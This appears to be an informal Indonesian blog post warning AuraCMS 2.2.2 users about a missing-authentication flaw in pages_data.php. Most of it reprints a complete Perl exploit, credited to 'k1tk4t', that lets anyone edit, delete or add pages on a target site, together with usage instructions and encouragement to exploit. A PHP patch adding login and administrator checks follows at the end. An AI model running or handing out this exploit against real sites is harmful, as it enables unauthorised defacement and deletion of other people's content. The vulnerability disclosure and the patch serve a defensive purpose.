Bagi pengguna AuraCMS 2.2.2 tolong segera melakukan patch pada CMS tersebut diatas itu mungkin kata Om k1tk4t kali ya.... hi .... ya walau masih belum kenal ma orangnya, tapi Nick tersebut Sampean pasti sudah pernah dengar (kalo yg sering berhubungan ma AuraCMS).

gara - garanya itu ikut - ikutan temen - temenku (ketularan nakal) itu mungkin tepatnya :) . Gimana tidak lawong konco2 kabeh iku podo iso ngehack (itu bahasa gaul komunitas bawah tanah Huekwkwkwkwkwkw) lah dalah kok ya ternyata asyik n jadi ketularan deehh....:p awalnya iseng - iseng akhirnya coba - coba lalu Tiiiiitttt sensorr

OK langsung ke pokok permasalahan, berikut exploit yang dibikin oleh Om k1tk4t :

use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Long;

if ( !$ARGV[1] ) {
print "\n ///////////////////////////////////////////////////////////";
print "\n // ..::> k1tk4t <::.. //";
print "\n // AuraCMS <= 2.2.2 (pages_data.php) //";
print "\n // Arbitrary Edit/Add/Delete data halaman exploit //";
print "\n ///////////////////////////////////////////////////////////";
print "\n[!] ";
print "\n[!] Penggunaan : perl auracms_pagesdata.pl [Site] [Path] [id_halaman] [options]";
print "\n[!] Contoh : perl auracms_pagesdata.pl localhost /toko/ 1 -o 1";
print "\n[!] Options : 1=Edit , 2=Delete, 3=Add";
print "\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $idhalaman = $ARGV[2];
my $isijudul = "Auracms";
my $isikonten = "Mohon Perhatian!!! terdapat kutu pada berkas pages_data.php, Arbitrary Edit-Add-Delete data halaman";
my $ambilkue = "http://".$host.$path."index.php";
my $browser = LWP::UserAgent->new;
my $kue = HTTP::Cookies->new();
my $hasil = "";
%options = ();
GetOptions(\%options, "o=i",);
if($options{"o"} && $options{"o"} == 1) {
$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=edit_saved&id=";
}
if($options{"o"} && $options{"o"} == 2) {
$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=delete&id=";
}
if($options{"o"} && $options{"o"} == 3) {
$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=add&id=";
}

$hasil = $browser->get($arbitrary);
if(!$hasil->is_success) {
die("[!] Gagal, berkas pages_data.php tidak tersedia\n");
}

# ambil kue dari website
$hasil = $browser->get($ambilkue);
$kue->extract_cookies($hasil);
$browser->cookie_jar($kue);

# arbitrary exploit
$arbitrary .= $idhalaman;
$hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],);
$konten = $hasil->content;
print $konten ;

simpan dengan nama aura.pl

untuk contoh penggunaannya sudah di tulis sama si pembuatnya tinggal jalankan $ perl /patch/aura.pl
akan muncul seperti pada gambar

dari gambar diatas sudah jelas tinggal eksploitasi sampean aja.

Sampai saat sampean membaca Artikel ini, saya masih belum mencoba di internet melainkan saya mencobanya di komputer local, Kenapa? karena saya sudah pernah merasakan bagaimana Jengkelnya ketika Website yg sudah susah payah kita bangun dikerjain ma seseorang :(. Sekedar saran saja lebih baik sampean coba pada komputer local.

berikut saya sertakan gambar yg telah di ubah oleh seseorang, Sumpah bukan Gue berani samber geledek deeh....

perbaikian yang saya lakukan

------------------------------ Copy Code ---------------------------

if(!cek_login()){

echo "Maaf anda tidak diperkenankan mengakses halaman ini";

}else{
if (session_is_registered ('LevelAkses') && $_SESSION['LevelAkses']=="Administrator"){

-------------------------- end code ---------------------------------

copy kan code diatas di atas code switch (@$_GET['action']){

lalu pada akhir halaman sebelum ?> (akhir TAG untuk php) beri tanda }} untuk menutup code yg sudah di copy tadi.

semoga bisa membantu.